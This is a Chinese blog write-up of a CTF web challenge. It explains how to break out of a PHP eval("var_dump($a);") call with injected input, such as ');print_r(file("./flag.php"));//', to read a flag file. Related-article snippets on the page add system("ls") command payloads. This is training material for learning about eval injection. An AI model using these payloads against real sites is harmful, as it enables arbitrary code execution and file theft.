CTF/CTF练习平台-本地包含【eval函数闭合及代码段的理解】

最新推荐文章于 2025-03-01 14:18:12 发布
最新推荐文章于 2025-03-01 14:18:12 发布
阅读量4.7w 收藏 22
点赞数 10
文章标签: ctf php代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wy_97/article/details/77452939
版权
本文通过一个具体的PHP代码示例详细解析了如何利用eval函数进行参数注入,并成功读取指定文件的过程。文章首先介绍了eval函数的基本用法,随后通过逐步实验展示了如何利用特殊的输入绕过安全限制,最终获取目标文件的内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原题内容:

地址:http://120.24.86.145:8003/

 

怎么说呢,难其实也不难,还是基本知识点掌握不足吧,写个wp记录下自己学习到的知识点

 

<?php 
    include "flag.php"; 
    $a = @$_REQUEST['hello']; 
    eval( "var_dump($a);"); 
    show_source(__FILE__); 
?>


拿到代码,还是很简单就分析出hello这个post/get获取的参数值很重要($_REQUEST对get,post都能接受)

 

简单起见,当然选择get传值

其实根据最基本注入''引号闭合的思路,很容易就想到了利用括号,毕竟,eval中是执行的代码段

最基本的:

 

http://120.24.86.145:8003/index.php?hello= 1);print_r(2


上面的代码结合起来就是:

 

 

eval( "var_dump(1);print_r(2);");


结果也是很明显:

 

说明执行没问题,其实后面就简单了,打开文件就好

下面理一理两个失误点,

 

 

第一点,看了大佬们wp,对大佬们的答案,非常不理解:

 

hello=);print_r(file("./flag.php"));//

 

问了一个大佬才知道这里的诀窍

划重点,这里很关键,

eval函数中,“”内部为代码,//只在代码中起作用,相当于只注释了);

 

第二点,file_get_contents与file及var_dump,print_r和echo(划重点,后面三个的区别有待解决

 

这个的区别我在网上没有找到详细的解释,不过,我本地做了个测试,简单说明下问题吧,求大佬解答

 

 

file测试没问题,接下来看file_get_contents,先不说明,看几张图

这个图的测试结果,显示空白,于是我进行了接下来的测试

 

 

 

这我就很好奇了,接下来我删除该字符串又测试了echo,依旧是空白

紧接着我测试了var_dump()

没错,可以显示

 

按照php手册的解释,file_get_contents读取文件为字符串,var_dump证明了这一点,可是print_r和echo为啥不能输出?

待解决,以后补上

 

 

CTFeval
qq_74263993的博客
04-27 1037
_REQUEST变量是一个关联数组,它的键是表单元素的名称,值是用户输入的数据。通过$_REQUEST变量,可以访问表单中所有输入字段的值,不论它们是使用GET、POST还是COOKIE方法提交的。在PHP中,$_REQUEST是一个超全局变量,用于收集HTML表单提交的数据。如果代码中存在解析错误,则 eval() 函数返回 false。hello=show_source('flag.php')该字符串必须是合法的 PHP 代码,且必须以分号结尾。
CTF练习题[WEB]-eval
weixin_45246254的博客
10-11 3694
https://ctf.bugku.com/challenges/detail/id/75.html?page=4 拿到题目如下 此题是php相关 var_dump函数打印a变量 <?php include "flag.php"; ## 引入flag.php $a = @$_REQUEST['hello']; ##a接收hello变量 eval( "var_dump($a);"); ##var_dump打印a变量 show_source(__FILE__)
这20个CTF练习平台让你从菜鸟变大神!零基础入门到精通,看这篇就够了!
最新发布
Innocence_0的博客
03-01 1074
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
BugkuCTF-WEB题eval
am_03的博客
08-25 1385
基础知识: var_dump() 函数用于输出变量的相关信息。 var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。 此题考察php相关 include是将flag.php文件包含进页面代码 $request可用于接受get和post的传递的参数 eval函数可以把字符串作为php命令执行 知道这些你就可以用get方法传递hello变量,并在hello其内写入查看flag.php的命令了 ?hello=file(‘flag.php’)
CTF之路:关于PHP eval() 注入问题
zw05011的博客
01-03 5487
CTF之路:关于PHP eval() 注入问题
CTF-WEB-eval
nive15的博客
11-05 285
用dirsearch扫描一下,发现flag.php,那么答案可能就在flag.php文件里。var_dump() 用于输出一个或多个表达式的类型和值。$request可用于接受get和post传递的函数。include是将flag.php包含进入页面代码。eval可以把字符串作为PHP命令执行。按下回车后单引号会变成%27。@符号用来抑制错误报告。
CTF/合天网安实验室-web100题解【eval与alert的利用】
Sp4rkW的博客
08-15 8007
原题内容: http://www.hetianlab.com/CTFrace.html web100打开可以看到只有一个很干净的zip文件下载(忍不住扫了一下目录,也bp看了一下,,没啥发现) 回到下载,解开压缩版,web100,无后缀名,个人的经验是不急着加后缀名啥的,直接用记事本直接打开 可得代码如下: &lt;script&gt;_='function $(){e=g...
【愚公系列】2024年03月 《CTF实战:从入门到提升》 010-Web安全入门(PHP代码执行漏洞)
热门推荐
时光隧道
03-28 9万+
PHP代码执行漏洞是一种常见的安全漏洞,也被称为远程代码执行(Remote Code Execution,RCE)漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入,导致用户能够将恶意代码插入到应用程序中,然后被解释器执行。攻击者可以利用这种漏洞执行任意代码,从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入:开发者在使用用户输入时必须进行严格的输入验证和过滤,避免直接将用户输入作为代码执行。eval() 和 exec() 函数
eval函数读取文件 ctf
09-02
- *3* [CTF/CTF练习平台-本地包含eval函数闭合代码段理解】](https://blog.csdn.net/wy_97/article/details/77452939)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...
eval执行
qq_69100706的博客
08-05 706
CTF(Capture The Flag)竞赛中,利用eval()函数进行远程代码执行(RCE)是一种常见的技巧,尤其是在PHP、Python、JavaScript等支持动态执行代码的编程语言中。eval()函数可以将字符串解析并执行为代码,这使得它成为潜在的安全风险,如果未经适当控制和验证,攻击者可以利用它来执行任意代码。
PHP ctf addslashes,[红日安全]代码审计Day13 - 特定场合下addslashes函数的绕过
weixin_33631836的博客
03-17 784
本文由红日安全成员: l1nk3r 编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 PHP-Audit-Labs 。现在大家所看到的系列文章,属于项目 第一阶段 的内容,本阶段的内容题目均来自 PHP SECURITY CALENDAR 2017 。对于每一道题目,我们均给出对应的分析,并...
ctf (easy_eval)
Glacier_Mount的博客
07-02 1881
反序列化、redis
CTFHub_技能树_Web之RCE——“eval执行”、“命令注入”
Ho1aAs‘s Blog
07-23 1万+
文章目录一、eval执行二、命令注入完 –>CTFHub传送门<– 一、eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> PHP代码显示,要求将命令赋值给cmd然后执行 先查看一下根目录文件 /?cmd=system("ls"); !切记最后的分号不可省略! 没有需要的文件 看看上一级的文件夹 /
ctf web方向与php学习记录5之eval()初见
这周末在做梦的博客
08-22 3212
由于bugku的本地包含无法打开,故找了其他人解题的过程以供学习。 https://www.cnblogs.com/0yst3r-2046/p/11062755.html 在本次学习中我将我学习的相关的原理和知识分享给大家,如下。 一,初见eval,智商开始下线 eval()函数中的evalevaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行,一般情况下不建议使用容易被黑客利用。 (1)定义和用法 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是是完整,合法的PH
ctfhub-eval执行
m0_52432374的博客
03-24 2054
ctfhub-eval执行 打开题目,发现是这个 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 然后百度eval()函数 eval():把字符串 code 作为PHP代码执行。函数eval()语言结构是 非常危险的, 因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外 别无方法
eval函数
xuchen16的博客
09-17 716
转载自https://www.jianshu.com/p/e7b5fd1771e0 eval函数   一,eval函数 1,函数原型 mixed eval ( string `$code` ) 2,作用 把字符串作为PHP代码执行 3,注意事项 代码不能包含打开/闭合PHP tags。 传入的必须是有效的PHP代码 所有语句必须以分号结尾...
CTFHub | eval执行
尼泊罗河伯的博客
04-19 1669
eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问题。
CTFHUB RCE-----eval执行
winofkill的博客
12-11 1757
首先进入题目 我们先了解一下php当中eval()函数的作用 eval()函数中的evalevaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行。 比如说eval($_REQUEST["cmd"]) $_REQUEST[]是接收数据用的,而其中的cmd 就是其中的数据 进入题目 cmd是其中的参数,我们就把命令赋给cmd,我们先显示一下网页的根目录 ?cmd=system("ls "); 接着我们看上一级目录 ?cmd=system("ls /")..
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值